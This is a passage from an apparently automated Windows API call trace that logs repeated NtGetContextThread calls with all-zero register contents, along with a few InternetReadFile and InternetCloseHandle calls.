[57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0), FloatSave.Cr0NpxState=0x0, SegGs=0x0, SegFs=0x0, SegEs=0x0, SegDs=0x0, Edi=0x0, Esi=0x0, Ebx=0x0, Edx=0x0, Ecx=0x0, Eax=0x0, Ebp=0x0, Eip=0x0, SegCs=0x0, EFlags=0x0, Esp=0x0, SegSs=0x0, ExtendedRegisters=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0, [80]=0x0, [81]=0x0, [82]=0x0, [83]=0x0, [84]=0x0, [85]=0x0, [86]=0x0, [87]=0x0, [88]=0x0, [89]=0x0, [90]=0x0, [91]=0x0, [92]=0x0, [93]=0x0, [94]=0x0, [95]=0x0, [96]=0x0, [97]=0x0, [98]=0x0, [99]=0x0, [100]=0x0, [101]=0x0, [102]=0x0, [103]=0x0, [104]=0x0, [105]=0x0, [106]=0x0, [107]=0x0, [108]=0x0, [109]=0x0, [110]=0x0, [111]=0x0, [112]=0x0, [113]=0x0, [114]=0x0, [115]=0x0, [116]=0x0, [117]=0x0, [118]=0x0, [119]=0x0, [120]=0x0, [121]=0x0, [122]=0x0, [123]=0x0, [124]=0x0, [125]=0x0, [126]=0x0, [127]=0x0, [128]=0x0, [129]=0x0, [130]=0x0, [131]=0x0, [132]=0x0, [133]=0x0, [134]=0x0, [135]=0x0, [136]=0x0, [137]=0x0, [138]=0x0, [139]=0x0, [140]=0x0, [141]=0x0, [142]=0x0, [143]=0x0, [144]=0x0, [145]=0x0, [146]=0x0, [147]=0x0, [148]=0x0, [149]=0x0, [150]=0x0, [151]=0x0, [152]=0x0, [153]=0x0, [154]=0x0, [155]=0x0, [156]=0x0, [157]=0x0, [158]=0x0, [159]=0x0, [160]=0x0, [161]=0x0, [162]=0x0, [163]=0x0, [164]=0x0, [165]=0x0, [166]=0x0, [167]=0x0, [168]=0x0, [169]=0x0, [170]=0x0, [171]=0x0, [172]=0x0, [173]=0x0, [174]=0x0, [175]=0x0, [176]=0x0, [177]=0x0, [178]=0x0, [179]=0x0, [180]=0x0, [181]=0x0, [182]=0x0, [183]=0x0, [184]=0x0, [185]=0x0, [186]=0x0, [187]=0x0, [188]=0x0, [189]=0x0, [190]=0x0, [191]=0x0, [192]=0x0, [193]=0x0, [194]=0x0, [195]=0x0, [196]=0x0, [197]=0x0, [198]=0x0, [199]=0x0, [200]=0x0, [201]=0x0, [202]=0x0, [203]=0x0, [204]=0x0, [205]=0x0, [206]=0x0, [207]=0x0, [208]=0x0, [209]=0x0, [210]=0x0, [211]=0x0, [212]=0x0, [213]=0x0, [214]=0x0, [215]=0x0, [216]=0x0, [217]=0x0, [218]=0x0, [219]=0x0, [220]=0x0, [221]=0x0, [222]=0x0, [223]=0x0, [224]=0x0, [225]=0x0, [226]=0x0, [227]=0x0, [228]=0x0, [229]=0x0, [230]=0x0, [231]=0x0, [232]=0x0, [233]=0x0, [234]=0x0, [235]=0x0, [236]=0x0, [237]=0x0, [238]=0x0, [239]=0x0, [240]=0x0, [241]=0x0, [242]=0x0, [243]=0x0, [244]=0x0, [245]=0x0, [246]=0x0, [247]=0x0, [248]=0x0, [249]=0x0, [250]=0x0, [251]=0x0, [252]=0x0, [253]=0x0, [254]=0x0, [255]=0x0, [256]=0x0, [257]=0x0, [258]=0x0, [259]=0x0, [260]=0x0, [261]=0x0, [262]=0x0, [263]=0x0, [264]=0x0, [265]=0x0, [266]=0x0, [267]=0x0, [268]=0x0, [269]=0x0, [270]=0x0, [271]=0x0, [272]=0x0, [273]=0x0, [274]=0x0, [275]=0x0, [276]=0x0, [277]=0x0, [278]=0x0, [279]=0x0, [280]=0x0, [281]=0x0, [282]=0x0, [283]=0x0, [284]=0x0, [285]=0x0, [286]=0x0, [287]=0x0, [288]=0x0, [289]=0x0, [290]=0x0, [291]=0x0, [292]=0x0, [293]=0x0, [294]=0x0, [295]=0x0, [296]=0x0, [297]=0x0, [298]=0x0, [299]=0x0, [300]=0x0, [301]=0x0, [302]=0x0, [303]=0x0, [304]=0x0, [305]=0x0, [306]=0x0, [307]=0x0, [308]=0x0, [309]=0x0, [310]=0x0, [311]=0x0, [312]=0x0, [313]=0x0, [314]=0x0, [315]=0x0, [316]=0x0, [317]=0x0, [318]=0x0, [319]=0x0, [320]=0x0, [321]=0x0, [322]=0x0, [323]=0x0, [324]=0x0, [325]=0x0, [326]=0x0, [327]=0x0, [328]=0x0, [329]=0x0, [330]=0x0, [331]=0x0, [332]=0x0, [333]=0x0, [334]=0x0, [335]=0x0, [336]=0x0, [337]=0x0, [338]=0x0, [339]=0x0, [340]=0x0, [341]=0x0, [342]=0x0, [343]=0x0, [344]=0x0, [345]=0x0, [346]=0x0, [347]=0x0, [348]=0x0, [349]=0x0, [350]=0x0, [351]=0x0, [352]=0x0, [353]=0x0, [354]=0x0, [355]=0x0, [356]=0x0, [357]=0x0, [358]=0x0, [359]=0x0, [360]=0x0, [361]=0x0, [362]=0x0, [363]=0x0, [364]=0x0, [365]=0x0, [366]=0x0, [367]=0x0, [368]=0x0, [369]=0x0, [370]=0x0, [371]=0x0, [372]=0x0, [373]=0x0, [374]=0x0, [375]=0x0, [376]=0x0, [377]=0x0, [378]=0x0, [379]=0x0, [380]=0x0, [381]=0x0, [382]=0x0, [383]=0x0, [384]=0x0, [385]=0x0, [386]=0x0, [387]=0x0, [388]=0x0, [389]=0x0, [390]=0x0, [391]=0x0, [392]=0x0, [393]=0x0, [394]=0x0, [395]=0x0, [396]=0x0, [397]=0x0, [398]=0x0, [399]=0x0, [400]=0x0, [401]=0x0, [402]=0x0, [403]=0x0, [404]=0x0, [405]=0x0, [406]=0x0, [407]=0x0, [408]=0x0, [409]=0x0, [410]=0x0, [411]=0x0, [412]=0x0, [413]=0x0, [414]=0x0, [415]=0x0, [416]=0x0, [417]=0x0, [418]=0x0, [419]=0x0, [420]=0x0, [421]=0x0, [422]=0x0, [423]=0x0, [424]=0x0, [425]=0x0, [426]=0x0, [427]=0x0, [428]=0x0, [429]=0x0, [430]=0x0, [431]=0x0, [432]=0x0, [433]=0x0, [434]=0x0, [435]=0x0, [436]=0x0, [437]=0x0, [438]=0x0, [439]=0x0, [440]=0x0, [441]=0x0, [442]=0x0, [443]=0x0, [444]=0x0, [445]=0x0, [446]=0x0, [447]=0x0, [448]=0x0, [449]=0x0, [450]=0x0, [451]=0x0, [452]=0x0, [453]=0x0, [454]=0x0, [455]=0x0, [456]=0x0, [457]=0x0, [458]=0x0, [459]=0x0, [460]=0x0, [461]=0x0, [462]=0x0, [463]=0x0, [464]=0x0, [465]=0x0, [466]=0x0, [467]=0x0, [468]=0x0, [469]=0x0, [470]=0x0, [471]=0x0, [472]=0x0, [473]=0x0, [474]=0x0, [475]=0x0, [476]=0x0, [477]=0x0, [478]=0x0, [479]=0x0, [480]=0x0, [481]=0x0, [482]=0x0, [483]=0x0, [484]=0x0, [485]=0x0, [486]=0x0, [487]=0x0, [488]=0x0, [489]=0x0, [490]=0x0, [491]=0x0, [492]=0x0, [493]=0x0, [494]=0x0, [495]=0x0, [496]=0x0, [497]=0x0, [498]=0x0, [499]=0x0, [500]=0x0, [501]=0x0, [502]=0x0, [503]=0x0, [504]=0x0, [505]=0x0, [506]=0x0, [507]=0x0, [508]=0x0, [509]=0x0, [510]=0x0, [511]=0x0))) returned 0x0 [0126.826] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x2596240, dwNumberOfBytesToRead=0x10000, lpdwNumberOfBytesRead=0x2dfc74 | out: lpBuffer=0x2596240*, lpdwNumberOfBytesRead=0x2dfc74*=0x0) returned 1 [0126.853] NtGetContextThread (in: ThreadHandle=0xfffffffe, Context=0x2545004 | out: Context=0x2545004*(ContextFlags=0x10010, Dr0=0x0, Dr1=0x0, Dr2=0x0, Dr3=0x0, Dr6=0x0, Dr7=0x0, FloatSave.ControlWord=0x0, FloatSave.StatusWord=0x0, FloatSave.TagWord=0x0, FloatSave.ErrorOffset=0x0, FloatSave.ErrorSelector=0x0, FloatSave.DataOffset=0x0, FloatSave.DataSelector=0x0, FloatSave.RegisterArea=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0), FloatSave.Cr0NpxState=0x0, SegGs=0x0, SegFs=0x0, SegEs=0x0, SegDs=0x0, Edi=0x0, Esi=0x0, Ebx=0x0, Edx=0x0, Ecx=0x0, Eax=0x0, Ebp=0x0, Eip=0x0, SegCs=0x0, EFlags=0x0, Esp=0x0, SegSs=0x0, ExtendedRegisters=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0, [80]=0x0, [81]=0x0, [82]=0x0, [83]=0x0, [84]=0x0, [85]=0x0, [86]=0x0, [87]=0x0, [88]=0x0, [89]=0x0, [90]=0x0, [91]=0x0, [92]=0x0, [93]=0x0, [94]=0x0, [95]=0x0, [96]=0x0, [97]=0x0, [98]=0x0, [99]=0x0, [100]=0x0, [101]=0x0, [102]=0x0, [103]=0x0, [104]=0x0, [105]=0x0, [106]=0x0, [107]=0x0, [108]=0x0, [109]=0x0, [110]=0x0, [111]=0x0, [112]=0x0, [113]=0x0, [114]=0x0, [115]=0x0, [116]=0x0, [117]=0x0, [118]=0x0, [119]=0x0, [120]=0x0, [121]=0x0, [122]=0x0, [123]=0x0, [124]=0x0, [125]=0x0, [126]=0x0, [127]=0x0, [128]=0x0, [129]=0x0, [130]=0x0, [131]=0x0, [132]=0x0, [133]=0x0, [134]=0x0, [135]=0x0, [136]=0x0, [137]=0x0, [138]=0x0, [139]=0x0, [140]=0x0, [141]=0x0, [142]=0x0, [143]=0x0, [144]=0x0, [145]=0x0, [146]=0x0, [147]=0x0, [148]=0x0, [149]=0x0, [150]=0x0, [151]=0x0, [152]=0x0, [153]=0x0, [154]=0x0, [155]=0x0, [156]=0x0, [157]=0x0, [158]=0x0, [159]=0x0, [160]=0x0, [161]=0x0, [162]=0x0, [163]=0x0, [164]=0x0, [165]=0x0, [166]=0x0, [167]=0x0, [168]=0x0, [169]=0x0, [170]=0x0, [171]=0x0, [172]=0x0, [173]=0x0, [174]=0x0, [175]=0x0, [176]=0x0, [177]=0x0, [178]=0x0, [179]=0x0, [180]=0x0, [181]=0x0, [182]=0x0, [183]=0x0, [184]=0x0, [185]=0x0, [186]=0x0, [187]=0x0, [188]=0x0, [189]=0x0, [190]=0x0, [191]=0x0, [192]=0x0, [193]=0x0, [194]=0x0, [195]=0x0, [196]=0x0, [197]=0x0, [198]=0x0, [199]=0x0, [200]=0x0, [201]=0x0, [202]=0x0, [203]=0x0, [204]=0x0, [205]=0x0, [206]=0x0, [207]=0x0, [208]=0x0, [209]=0x0, [210]=0x0, [211]=0x0, [212]=0x0, [213]=0x0, [214]=0x0, [215]=0x0, [216]=0x0, [217]=0x0, [218]=0x0, [219]=0x0, [220]=0x0, [221]=0x0, [222]=0x0, [223]=0x0, [224]=0x0, [225]=0x0, [226]=0x0, [227]=0x0, [228]=0x0, [229]=0x0, [230]=0x0, [231]=0x0, [232]=0x0, [233]=0x0, [234]=0x0, [235]=0x0, [236]=0x0, [237]=0x0, [238]=0x0, [239]=0x0, [240]=0x0, [241]=0x0, [242]=0x0, [243]=0x0, [244]=0x0, [245]=0x0, [246]=0x0, [247]=0x0, [248]=0x0, [249]=0x0, [250]=0x0, [251]=0x0, [252]=0x0, [253]=0x0, [254]=0x0, [255]=0x0, [256]=0x0, [257]=0x0, [258]=0x0, [259]=0x0, [260]=0x0, [261]=0x0, [262]=0x0, [263]=0x0, [264]=0x0, [265]=0x0, [266]=0x0, [267]=0x0, [268]=0x0, [269]=0x0, [270]=0x0, [271]=0x0, [272]=0x0, [273]=0x0, [274]=0x0, [275]=0x0, [276]=0x0, [277]=0x0, [278]=0x0, [279]=0x0, [280]=0x0, [281]=0x0, [282]=0x0, [283]=0x0, [284]=0x0, [285]=0x0, [286]=0x0, [287]=0x0, [288]=0x0, [289]=0x0, [290]=0x0, [291]=0x0, [292]=0x0, [293]=0x0, [294]=0x0, [295]=0x0, [296]=0x0, [297]=0x0, [298]=0x0, [299]=0x0, [300]=0x0, [301]=0x0, [302]=0x0, [303]=0x0, [304]=0x0, [305]=0x0, [306]=0x0, [307]=0x0, [308]=0x0, [309]=0x0, [310]=0x0, [311]=0x0, [312]=0x0, [313]=0x0, [314]=0x0, [315]=0x0, [316]=0x0, [317]=0x0, [318]=0x0, [319]=0x0, [320]=0x0, [321]=0x0, [322]=0x0, [323]=0x0, [324]=0x0, [325]=0x0, [326]=0x0, [327]=0x0, [328]=0x0, [329]=0x0, [330]=0x0, [331]=0x0, [332]=0x0, [333]=0x0, [334]=0x0, [335]=0x0, [336]=0x0, [337]=0x0, [338]=0x0, [339]=0x0, [340]=0x0, [341]=0x0, [342]=0x0, [343]=0x0, [344]=0x0, [345]=0x0, [346]=0x0, [347]=0x0, [348]=0x0, [349]=0x0, [350]=0x0, [351]=0x0, [352]=0x0, [353]=0x0, [354]=0x0, [355]=0x0, [356]=0x0, [357]=0x0, [358]=0x0, [359]=0x0, [360]=0x0, [361]=0x0, [362]=0x0, [363]=0x0, [364]=0x0, [365]=0x0, [366]=0x0, [367]=0x0, [368]=0x0, [369]=0x0, [370]=0x0, [371]=0x0, [372]=0x0, [373]=0x0, [374]=0x0, [375]=0x0, [376]=0x0, [377]=0x0, [378]=0x0, [379]=0x0, [380]=0x0, [381]=0x0, [382]=0x0, [383]=0x0, [384]=0x0, [385]=0x0, [386]=0x0, [387]=0x0, [388]=0x0, [389]=0x0, [390]=0x0, [391]=0x0, [392]=0x0, [393]=0x0, [394]=0x0, [395]=0x0, [396]=0x0, [397]=0x0, [398]=0x0, [399]=0x0, [400]=0x0, [401]=0x0, [402]=0x0, [403]=0x0, [404]=0x0, [405]=0x0, [406]=0x0, [407]=0x0, [408]=0x0, [409]=0x0, [410]=0x0, [411]=0x0, [412]=0x0, [413]=0x0, [414]=0x0, [415]=0x0, [416]=0x0, [417]=0x0, [418]=0x0, [419]=0x0, [420]=0x0, [421]=0x0, [422]=0x0, [423]=0x0, [424]=0x0, [425]=0x0, [426]=0x0, [427]=0x0, [428]=0x0, [429]=0x0, [430]=0x0, [431]=0x0, [432]=0x0, [433]=0x0, [434]=0x0, [435]=0x0, [436]=0x0, [437]=0x0, [438]=0x0, [439]=0x0, [440]=0x0, [441]=0x0, [442]=0x0, [443]=0x0, [444]=0x0, [445]=0x0, [446]=0x0, [447]=0x0, [448]=0x0, [449]=0x0, [450]=0x0, [451]=0x0, [452]=0x0, [453]=0x0, [454]=0x0, [455]=0x0, [456]=0x0, [457]=0x0, [458]=0x0, [459]=0x0, [460]=0x0, [461]=0x0, [462]=0x0, [463]=0x0, [464]=0x0, [465]=0x0, [466]=0x0, [467]=0x0, [468]=0x0, [469]=0x0, [470]=0x0, [471]=0x0, [472]=0x0, [473]=0x0, [474]=0x0, [475]=0x0, [476]=0x0, [477]=0x0, [478]=0x0, [479]=0x0, [480]=0x0, [481]=0x0, [482]=0x0, [483]=0x0, [484]=0x0, [485]=0x0, [486]=0x0, [487]=0x0, [488]=0x0, [489]=0x0, [490]=0x0, [491]=0x0, [492]=0x0, [493]=0x0, [494]=0x0, [495]=0x0, [496]=0x0, [497]=0x0, [498]=0x0, [499]=0x0, [500]=0x0, [501]=0x0, [502]=0x0, [503]=0x0, [504]=0x0, [505]=0x0, [506]=0x0, [507]=0x0, [508]=0x0, [509]=0x0, [510]=0x0, [511]=0x0))) returned 0x0 [0126.853] InternetCloseHandle (hInternet=0xcc0004) returned 1 [0126.860] NtGetContextThread (in: ThreadHandle=0xfffffffe, Context=0x2545004 | out: Context=0x2545004*(ContextFlags=0x10010, Dr0=0x0, Dr1=0x0, Dr2=0x0, Dr3=0x0, Dr6=0x0, Dr7=0x0, FloatSave.ControlWord=0x0, FloatSave.StatusWord=0x0, FloatSave.TagWord=0x0, FloatSave.ErrorOffset=0x0, FloatSave.ErrorSelector=0x0, FloatSave.DataOffset=0x0, FloatSave.DataSelector=0x0, FloatSave.RegisterArea=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0), FloatSave.Cr0NpxState=0x0, SegGs=0x0, SegFs=0x0, SegEs=0x0, SegDs=0x0, Edi=0x0, Esi=0x0, Ebx=0x0, Edx=0x0, Ecx=0x0, Eax=0x0, Ebp=0x0, Eip=0x0, SegCs=0x0, EFlags=0x0, Esp=0x0, SegSs=0x0, ExtendedRegisters=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0, [80]=0x0, [81]=0x0, [82]=0x0, [83]=0x0, [84]=0x0, [85]=0x0, [86]=0x0, [87]=0x0, [88]=0x0, [89]=0x0, [90]=0x0, [91]=0x0, [92]=0x0, [93]=0x0, [94]=0x0, [95]=0x0, [96]=0x0, [97]=0x0, [98]=0x0, [99]=0x0, [100]=0x0, [101]=0x0, [102]=0x0, [103]=0x0, [104]=0x0, [105]=0x0, [106]=0x0, [107]=0x0, [108]=0x0, [109]=0x0, [110]=0x0, [111]=0x0, [112]=0x0, [113]=0x0, [114]=0x0, [115]=0x0, [116]=0x0, [117]=0x0, [118]=0x0, [119]=0x0, [120]=0x0, [121]=0x0, [122]=0x0, [123]=0x0, [124]=0x0, [125]=0x0, [126]=0x0, [127]=0x0, [128]=0x0, [129]=0x0, [130]=0x0, [131]=0x0, [132]=0x0, [133]=0x0, [134]=0x0, [135]=0x0, [136]=0x0, [137]=0x0, [138]=0x0, [139]=0x0, [140]=0x0, [141]=0x0, [142]=0x0, [143]=0x0, [144]=0x0, [145]=0x0, [146]=0x0, [147]=0x0, [148]=0x0, [149]=0x0, [150]=0x0, [151]=0x0, [152]=0x0, [153]=0x0, [154]=0x0, [155]=0x0, [156]=0x0, [157]=0x0, [158]=0x0, [159]=0x0, [160]=0x0, [161]=0x0, [162]=0x0, [163]=0x0, [164]=0x0, [165]=0x0, [166]=0x0, [167]=0x0, [168]=0x0, [169]=0x0, [170]=0x0, [171]=0x0, [172]=0x0, [173]=0x0, [174]=0x0, [175]=0x0, [176]=0x0, [177]=0x0, [178]=0x0, [179]=0x0, [180]=0x0, [181]=0x0, [182]=0x0, [183]=0x0, [184]=0x0, [185]=0x0, [186]=0x0, [187]=0x0, [188]=0x0, [189]=0x0, [190]=0x0, [191]=0x0, [192]=0x0, [193]=0x0, [194]=0x0, [195]=0x0, [196]=0x0, [197]=0x0, [198]=0x0, [199]=0x0, [200]=0x0, [201]=0x0, [202]=0x0, [203]=0x0, [204]=0x0, [205]=0x0, [206]=0x0, [207]=0x0, [208]=0x0, [209]=0x0, [210]=0x0, [211]=0x0, [212]=0x0, [213]=0x0, [214]=0x0, [215]=0x0, [216]=0x0, [217]=0x0, [218]=0x0, [219]=0x0, [220]=0x0, [221]=0x0, [222]=0x0, [223]=0x0, [224]=0x0, [225]=0x0, [226]=0x0, [227]=0x0, [228]=0x0, [229]=0x0, [230]=0x0, [231]=0x0, [232]=0x0, [233]=0x0, [234]=0x0, [235]=0x0, [236]=0x0, [237]=0x0, [238]=0x0, [239]=0x0, [240]=0x0, [241]=0x0, [242]=0x0, [243]=0x0, [244]=0x0, [245]=0x0, [246]=0x0, [247]=0x0, [248]=0x0, [249]=0x0, [250]=0x0, [251]=0x0, [252]=0x0, [253]=0x0, [254]=0x0, [255]=0x0, [256]=0x0, [257]=0x0, [258]=0x0, [259]=0x0, [260]=0x0, [261]=0x0, [262]=0x0, [263]=0x0, [264]=0x0, [265]=0x0, [266]=0x0, [267]=0x0, [268]=0x0, [269]=0x0, [270]=0x0, [271]=0x0, [272]=0x0, [273]=0x0, [274]=0x0, [275]=0x0, [276]=0x0, [277]=0x0, [278]=0x0, [279]=0x0, [280]=0x0, [281]=0x0, [282]=0x0, [283]=0x0, [284]=0x0, [285]=0x0, [286]=0x0, [287]=0x0, [288]=0x0, [289]=0x0, [290]=0x0, [291]=0x0, [292]=0x0, [293]=0x0, [294]=0x0, [295]=0x0, [296]=0x0, [297]=0x0, [298]=0x0, [299]=0x0, [300]=0x0, [301]=0x0, [302]=0x0, [303]=0x0, [304]=0x0, [305]=0x0, [306]=0x0, [307]=0x0, [308]=0x0, [309]=0x0, [310]=0x0, [311]=0x0, [312]=0x0, [313]=0x0, [314]=0x0, [315]=0x0, [316]=0x0, [317]=0x0, [318]=0x0, [319]=0x0, [320]=0x0, [321]=0x0, [322]=0x0, [323]=0x0, [324]=0x0, [325]=0x0, [326]=0x0, [327]=0x0, [328]=0x0, [329]=0x0, [330]=0x0, [331]=0x0, [332]=0x0, [333]=0x0, [334]=0x0, [335]=0x0, [336]=0x0, [337]=0x0, [338]=0x0, [339]=0x0, [340]=0x0, [341]=0x0, [342]=0x0, [343]=0x0, [344]=0x0, [345]=0x0, [346]=0x0, [347]=0x0, [348]=0x0, [349]=0x0, [350]=0x0, [351]=0x0, [352]=0x0, [353]=0x0, [354]=0x0, [355]=0x0, [356]=0x0, [357]=0x0, [358]=0x0, [359]=0x0, [360]=0x0, [361]=0x0, [362]=0x0, [363]=0x0, [364]=0x0, [365]=0x0, [366]=0x0, [367]=0x0, [368]=0x0, [369]=0x0, [370]=0x0, [371]=0x0, [372]=0x0, [373]=0x0, [374]=0x0, [375]=0x0, [376]=0x0, [377]=0x0, [378]=0x0, [379]=0x0, [380]=0x0, [381]=0x0, [382]=0x0, [383]=0x0, [384]=0x0, [385]=0x0, [386]=0x0, [387]=0x0, [388]=0x0, [389]=0x0, [390]=0x0, [391]=0x0, [392]=0x0, [393]=0x0, [394]=0x0, [395]=0x0, [396]=0x0, [397]=0x0, [398]=0x0, [399]=0x0, [400]=0x0, [401]=0x0, [402]=0x0, [403]=0x0, [404]=0x0, [405]=0x0, [406]=0x0, [407]=0x0, [408]=0x0, [409]=0x0, [410]=0x0, [411]=0x0, [412]=0x0, [413]=0x0, [414]=0x0, [415]=0x0, [416]=0x0, [417]=0x0, [418]=0x0, [419]=0x0, [420]=0x0, [421]=0x0, [422]=0x0, [423]=0x0, [424]=0x0, [425]=0x0, [426]=0x0, [427]=0x0, [428]=0x0, [429]=0x0, [430]=0x0, [431]=0x0, [432]=0x0, [433]=0x0, [434]=0x0, [435]=0x0, [436]=0x0, [437]=0x0, [438]=0x0, [439]=0x0, [440]=0x0, [441]=0x0, [442]=0x0, [443]=0x0, [444]=0x0, [445]=0x0, [446]=0x0, [447]=0x0, [448]=0x0, [449]=0x0, [450]=0x0, [451]=0x0, [452]=0x0, [453]=0x0, [454]=0x0, [455]=0x0, [456]=0x0, [457]=0x0, [458]=0x0, [459]=0x0, [460]=0x0, [461]=0x0, [462]=0x0, [463]=0x0, [464]=0x0, [465]=0x0, [466]=0x0, [467]=0x0, [468]=0x0, [469]=0x0, [470]=0x0, [471]=0x0, [472]=0x0, [473]=0x0, [474]=0x0, [475]=0x0, [476]=0x0, [477]=0x0, [478]=0x0, [479]=0x0, [480]=0x0, [481]=0x0, [482]=0x0, [483]=0x0, [484]=0x0, [485]=0x0, [486]=0x0, [487]=0x0, [488]=0x0, [489]=0x0, [490]=0x0, [491]=0x0, [492]=0x0, [493]=0x0, [494]=0x0, [495]=0x0, [496]=0x0, [497]=0x0, [498]=0x0, [499]=0x0, [500]=0x0, [501]=0x0, [502]=0x0, [503]=0x0, [504]=0x0, [505]=0x0, [506]=0x0, [507]=0x0, [508]=0x0, [509]=0x0, [510]=0x0, [511]=0x0))) returned 0x0 [0126.861] InternetCloseHandle (hInternet=0xcc000c) returned 0 [0126.899] NtGetContextThread (in: 